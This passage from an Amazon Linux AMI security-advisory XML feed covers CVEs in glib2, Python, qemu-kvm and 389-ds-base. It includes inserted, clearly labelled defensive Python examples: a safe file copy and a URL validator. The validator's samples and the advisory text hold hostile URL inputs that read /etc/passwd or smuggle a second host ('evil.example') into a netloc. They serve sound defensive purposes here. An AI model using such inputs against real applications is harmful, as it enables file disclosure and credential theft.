arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.5-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-1.30.11.amzn1.x86_64.rpm</filename></package><package name="ruby24" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.5-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.3" release="1.30.11.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.3-1.30.11.amzn1.noarch.rpm</filename></package><package name="ruby24-libs" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.5-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-1.30.11.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.5-1.30.11.amzn1.noarch.rpm</filename></package><package name="ruby24-irb" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.5-1.30.11.amzn1.noarch.rpm</filename></package><package name="ruby24" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.5-1.30.11.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.11.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem24-json-2.0.4-1.30.11.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.11.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.5-1.30.11.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-1.30.11.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-1.30.11.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.5-1.30.11.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.11.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.5-1.30.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1256</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1256: medium priority package update for glib2</title><issued date="2019-08-07 23:00:00" /><updated date="2019-08-12 18:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12450:
file_copy_fallback in gio/gfile.c in GNOME GLib 2.15.0 through 2.61.1 does not properly restrict file permissions while a copy operation is in progress. Instead, default permissions are used.
1719141:
CVE-2019-12450 glib2: file_copy_fallback in gio/gfile.c in GNOME GLib does not properly restrict file permissions while a copy operation is in progress
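Added example (not GLib code, and not part of the advisory text above): the pattern a copy routine needs so that the destination is never readable by others while its content is still being written, shown in Python. The destination is created with mode 0600 and O_EXCL (so an existing file or symlink at that path is not silently reused), the data is written, and only then are the source's permission bits applied, via fchmod on the open descriptor so there is no path-based race. The sample file and its 0644 mode are constructed for the demo; copying the source's mode at the end is an assumed policy, not GLib's exact semantics.

```python
import os
import shutil
import stat
import tempfile


def copy_with_restricted_perms(src, dst):
    """Copy src to dst without a window in which dst carries default
    (umask-derived) permissions.  Returns (mode_while_copying, mode_after)
    so the two states can be inspected."""
    src_mode = stat.S_IMODE(os.stat(src).st_mode)
    # 0600 at creation: umask can only remove bits, never add group/other.
    fd = os.open(dst, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    mode_during = stat.S_IMODE(os.fstat(fd).st_mode)
    with open(src, "rb") as fin, os.fdopen(fd, "wb") as fout:
        shutil.copyfileobj(fin, fout)
        fout.flush()
        # Content is complete: now relax to the source's mode, on the fd.
        os.fchmod(fout.fileno(), src_mode)
    mode_after = stat.S_IMODE(os.stat(dst).st_mode)
    return mode_during, mode_after


def demo():
    """Constructed input: a 0644 file copied into the same temp directory."""
    tmp = tempfile.mkdtemp()
    try:
        src = os.path.join(tmp, "secret.txt")
        with open(src, "wb") as f:
            f.write(b"constructed sample content\n")
        os.chmod(src, 0o644)
        return copy_with_restricted_perms(src, os.path.join(tmp, "copy.txt"))
    finally:
        shutil.rmtree(tmp)
```

If the copy is interrupted, the partial file is left at 0600 rather than at whatever the process umask happened to allow, which is the property the GLib fix restores.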
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12450" title="" id="CVE-2019-12450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2-debuginfo" version="2.36.3" release="5.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.21.amzn1.x86_64.rpm</filename></package><package name="glib2" version="2.36.3" release="5.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.21.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.21.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.21.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.21.amzn1.noarch.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.21.amzn1.x86_64.rpm</filename></package><package name="glib2" version="2.36.3" release="5.21.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.21.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.21.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.21.amzn1.i686.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.21.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.21.amzn1.i686.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.21.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1257</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1257: low priority package update for 
GraphicsMagick</title><issued date="2019-08-07 23:01:00" /><updated date="2019-08-12 18:21:00" /><severity>low</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-doc" version="1.3.32" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.32-1.16.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.32-1.16.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.32-1.16.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.32" release="1.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.32-1.16.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.32-1.16.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.32-1.16.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.32-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1258</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1258: important priority package update for python27</title><issued date="2019-08-07 23:02:00" /><updated date="2019-08-12 18:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9948:
urllib in Python 2.x through 2.7.16 supports the local_file: scheme, which makes it easier for remote attackers to bypass protection mechanisms that blacklist file: URIs, as demonstrated by triggering a urllib.urlopen(&#039;local_file:///etc/passwd&#039;) call.
1695570:
CVE-2019-9948 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms
CVE-2019-10160:
A security regression of CVE-2019-9636 was discovered in python, since commit d537ab0ff9767ef024f26246899728f0116b1ec3, which still allows an attacker to exploit CVE-2019-9636 by abusing the user and password parts of a URL. When an application parses user-supplied URLs to store cookies, authentication credentials, or other kinds of information, an attacker can provide specially crafted URLs that make the application locate host-related information (e.g. cookies, authentication data) and send it to a different host than it should, which would not happen if the URLs had been correctly parsed. The result of an attack may vary based on the application.
1718388:
CVE-2019-10160 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc
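Added example (not CPython code, and not part of the advisory text above) covering both vulnerabilities in this advisory and the CVE-2019-10160 entry repeated for python34/35/36 in ALAS-2019-1259 below: an application-side URL validator. It accepts schemes by allowlist, so an undocumented scheme such as local_file: is rejected without anyone having to know it exists, and it applies the NFKC check to the whole netloc (user, password, host and port) rather than to the host alone, which is the gap CVE-2019-10160 describes. Patched Pythons already raise ValueError from urlsplit for the NFKC cases; the validator treats that as a rejection and keeps its own check as defense in depth. The helper names, the allowed-host set and the sample URLs are constructed for the example; str.isascii() needs Python 3.7 or later.

```python
import unicodedata
from urllib.parse import urlsplit

# Allowlist: anything not listed here is refused, including file:, ftp:
# and schemes the library happens to support but the application never needs.
ALLOWED_SCHEMES = ("http", "https")


def netloc_gains_delimiters(netloc):
    """True if NFKC normalization would introduce a URL delimiter into the
    netloc.  The delimiters that are legitimately present (userinfo '@',
    port ':', and '#'/'?' that a parser has already split off) are removed
    first, so only characters that *become* delimiters are flagged.  This is
    an assumed helper written for the example, not the stdlib's own check."""
    if netloc.isascii():
        return False
    stripped = netloc
    for c in "@:#?":
        stripped = stripped.replace(c, "")
    normalized = unicodedata.normalize("NFKC", stripped)
    return any(c in normalized for c in "/?#@:")


def validate_fetch_url(url, allowed_hosts):
    """Return (ok, reason).  ok is True only for an http(s) URL whose netloc
    survives NFKC normalization and whose host is in allowed_hosts."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        # Fixed interpreters reject NFKC-altered netlocs here; treat as unsafe.
        return False, "unparseable: %s" % exc
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if netloc_gains_delimiters(parts.netloc):
        return False, "netloc changes under NFKC normalization"
    host = parts.hostname or ""
    if host not in allowed_hosts:
        return False, "host %r not allowed" % host
    return True, "ok"


def demo():
    """Constructed inputs: one benign URL with userinfo and port, the
    local_file: bypass from CVE-2019-9948, a plain file: URL, a fullwidth '#'
    in the host part (CVE-2019-9636 style) and U+2100, which normalizes to
    'a/c', hidden in the password part (the CVE-2019-10160 case)."""
    allowed = {"example.com"}
    samples = (
        "https://user:pw@example.com:8443/x",
        "local_file:///etc/passwd",
        "file:///etc/passwd",
        "https://example.com\uFF03@evil.example/",
        "https://u:p\u2100w@example.com/",
        "https://evil.example/",
    )
    return {u: validate_fetch_url(u, allowed) for u in samples}
```

Note that urlsplit does not even recognise local_file as a scheme (the underscore is not a scheme character), so a blocklist keyed on the parsed scheme would see an empty scheme and could wave the URL through; the allowlist rejects it either way.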
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10160" title="" id="CVE-2019-10160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9948" title="" id="CVE-2019-9948" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.16-1.129.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.16-1.129.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.16-1.129.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.16" 
release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.16-1.129.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.16-1.129.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.16-1.129.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1259</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1259: important priority package update for python34 python35 python36</title><issued date="2019-08-07 23:03:00" /><updated date="2019-08-12 18:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-10160:
A security regression of CVE-2019-9636 was discovered in python, since commit d537ab0ff9767ef024f26246899728f0116b1ec3, which still allows an attacker to exploit CVE-2019-9636 by abusing the user and password parts of a URL. When an application parses user-supplied URLs to store cookies, authentication credentials, or other kinds of information, an attacker can provide specially crafted URLs that make the application locate host-related information (e.g. cookies, authentication data) and send it to a different host than it should, which would not happen if the URLs had been correctly parsed. The result of an attack may vary based on the application.
1718388:
CVE-2019-10160 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10160" title="" id="CVE-2019-10160" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-devel" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.47.amzn1.i686.rpm</filename></package><package 
name="python34-debuginfo" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.7" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/python35-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.8-1.14.amzn1.i686.rpm</filename></package><package 
name="python36-debuginfo" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.8-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1260</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1260: important priority package update for qemu-kvm</title><issued date="2019-08-07 23:12:00" /><updated date="2019-08-12 18:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11091:
Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.
1705312:
CVE-2019-11091 hardware: Microarchitectural Data Sampling Uncacheable Memory (MDSUM)
CVE-2018-12130:
A flaw was found in the implementation of the &quot;fill buffer&quot;, a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer.
1646784:
CVE-2018-12130 hardware: Microarchitectural Fill Buffer Data Sampling (MFBDS)
CVE-2018-12127:
Microprocessors use a load port subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPU&#039;s pipelines. Stale load operation results are stored in the &#039;load port&#039; table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests, leaking data back to the attacker via a timing side-channel.
1667782:
CVE-2018-12127 hardware: Micro-architectural Load Port Data Sampling - Information Leak (MLPDS)
CVE-2018-12126:
Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the &#039;processor store buffer&#039;. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU&#039;s processor store buffer.
1646781:
CVE-2018-12126 hardware: Microarchitectural Store Buffer Data Sampling (MSBDS)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12126" title="" id="CVE-2018-12126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12127" title="" id="CVE-2018-12127" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12130" title="" id="CVE-2018-12130" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11091" title="" id="CVE-2019-11091" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm" version="1.5.3" release="156.16.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.16.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.16.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.16.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.16.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.16.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.16.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.16.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.16.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.16.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1261</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1261: medium priority package update for 389-ds-base</title><issued date="2019-08-07 23:13:00" /><updated date="2019-08-12 18:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3883:
It was found that encrypted connections did not honor the &#039;ioblocktimeout&#039; parameter to end blocking requests. As a result, an unauthenticated attacker could repeatedly start a sufficient number of encrypted connections to block all workers, resulting in a denial of service.
1693612:
CVE-2019-3883 389-ds-base: DoS via hanging secured connections
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3883" title="" id="CVE-2019-3883" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-snmp" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.8.4-25.1.62.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.8.4-25.1.62.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.8.4-25.1.62.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.8.4-25.1.62.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.8.4-25.1.62.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.8.4-25.1.62.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.8.4-25.1.62.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.8.4-25.1.62.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" 